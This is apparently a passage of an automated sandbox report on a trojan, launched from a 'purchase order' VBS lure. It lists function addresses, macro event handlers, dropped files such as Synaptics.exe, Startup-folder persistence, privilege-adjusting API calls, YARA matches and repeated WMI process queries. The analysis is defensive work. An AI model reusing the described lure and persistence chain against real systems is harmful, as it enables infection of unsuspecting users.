                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F220C4_2_004F220C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B85304_2_004B8530
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D06774_2_004D0677
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B66704_2_004B6670
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E87794_2_004E8779
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0051A8DC4_2_0051A8DC
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D0A8F4_2_004D0A8F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B6BBC4_2_004B6BBC
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004DAC834_2_004DAC83
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B8CA04_2_004B8CA0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CAD5C4_2_004CAD5C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D0EC44_2_004D0EC4
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E4EBF4_2_004E4EBF
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E113E4_2_004E113E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D12F94_2_004D12F9
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E542F4_2_004E542F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0051F5D04_2_0051F5D0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E599F4_2_004E599F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004DDA744_2_004DDA74
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B5D324_2_004B5D32
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004DBDF64_2_004DBDF6
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004BBDF04_2_004BBDF0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D1E5A4_2_004D1E5A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004DDF694_2_004DDF69
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E7FFD4_2_004E7FFD
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FBFB84_2_004FBFB8
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C4DCD013_2_00C4DCD0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C4A0C013_2_00C4A0C0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C6018313_2_00C60183
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8220C13_2_00C8220C
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C4853013_2_00C48530
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C6067713_2_00C60677
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C4667013_2_00C46670
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7877913_2_00C78779
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00CAA8DC13_2_00CAA8DC
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C60A8F13_2_00C60A8F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C46BBC13_2_00C46BBC
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C52B4013_2_00C52B40
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C6AC8313_2_00C6AC83
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C48CA013_2_00C48CA0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C5AD5C13_2_00C5AD5C
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C60EC413_2_00C60EC4
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C74EBF13_2_00C74EBF
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00CA30AD13_2_00CA30AD
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7113E13_2_00C7113E
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C612F913_2_00C612F9
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7542F13_2_00C7542F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00CAF5D013_2_00CAF5D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C5368013_2_00C53680
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7599F13_2_00C7599F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C6DA7413_2_00C6DA74
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C6BDF613_2_00C6BDF6
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C4BDF013_2_00C4BDF0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C45D3213_2_00C45D32
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C61E5A13_2_00C61E5A
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C77FFD13_2_00C77FFD
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8BFB813_2_00C8BFB8
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C6DF6913_2_00C6DF69
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ACDCD032_2_00ACDCD0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ACA0C032_2_00ACA0C0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE018332_2_00AE0183
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0220C32_2_00B0220C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AC853032_2_00AC8530
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE067732_2_00AE0677
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AC667032_2_00AC6670
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AF877932_2_00AF8779
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B2A8DC32_2_00B2A8DC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE0A8F32_2_00AE0A8F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AC6BBC32_2_00AC6BBC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AD2B4032_2_00AD2B40
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AC8CA032_2_00AC8CA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AEAC8332_2_00AEAC83
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ADAD5C32_2_00ADAD5C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AF4EBF32_2_00AF4EBF
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE0EC432_2_00AE0EC4
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B230AD32_2_00B230AD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AF113E32_2_00AF113E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE12F932_2_00AE12F9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AF542F32_2_00AF542F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B2F5D032_2_00B2F5D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AD368032_2_00AD3680
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AF599F32_2_00AF599F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AEDA7432_2_00AEDA74
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AEBDF632_2_00AEBDF6
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ACBDF032_2_00ACBDF0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AC5D3232_2_00AC5D32
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE1E5A32_2_00AE1E5A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0BFB832_2_00B0BFB8
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AF7FFD32_2_00AF7FFD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AEDF6932_2_00AEDF69
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX4FAD.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\Synaptics.exe E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: String function: 00AE7750 appears 42 times
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: String function: 00ADF885 appears 68 times
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: String function: 004CF885 appears 68 times
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: String function: 004D7750 appears 42 times
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: String function: 00C5F885 appears 68 times
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: String function: 00C67750 appears 42 times
                            Source: Open Purchase Order Summary Sheet.vbsInitial sample: Strings found which are bigger than 50
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184
                            Source: Machine-PO[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Machine-PO[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: Google.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Google.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RCX4FAD.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: ~$cache1.7.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: ~$cache1.26.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@30/79@12/5
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FD712 GetLastError,FormatMessageW,4_2_004FD712
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EB8B0 AdjustTokenPrivileges,CloseHandle,4_2_004EB8B0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,4_2_004EBEC3
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7B8B0 AdjustTokenPrivileges,CloseHandle,13_2_00C7B8B0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00C7BEC3
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AFB8B0 AdjustTokenPrivileges,CloseHandle,32_2_00AFB8B0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AFBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,32_2_00AFBEC3
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,4_2_004FEA85
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,4_2_004F6F5B
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FEFCD CoInitialize,CoCreateInstance,CoUninitialize,4_2_004FEFCD
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,4_2_004B31F2
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exeJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8060
                            Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7732
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Local\Temp\._cache_Google.exeJump to behavior
                            Source: Yara matchFile source: 3.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1491991054.000001C7E4325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1489527572.000001C7E5148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4FAD.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
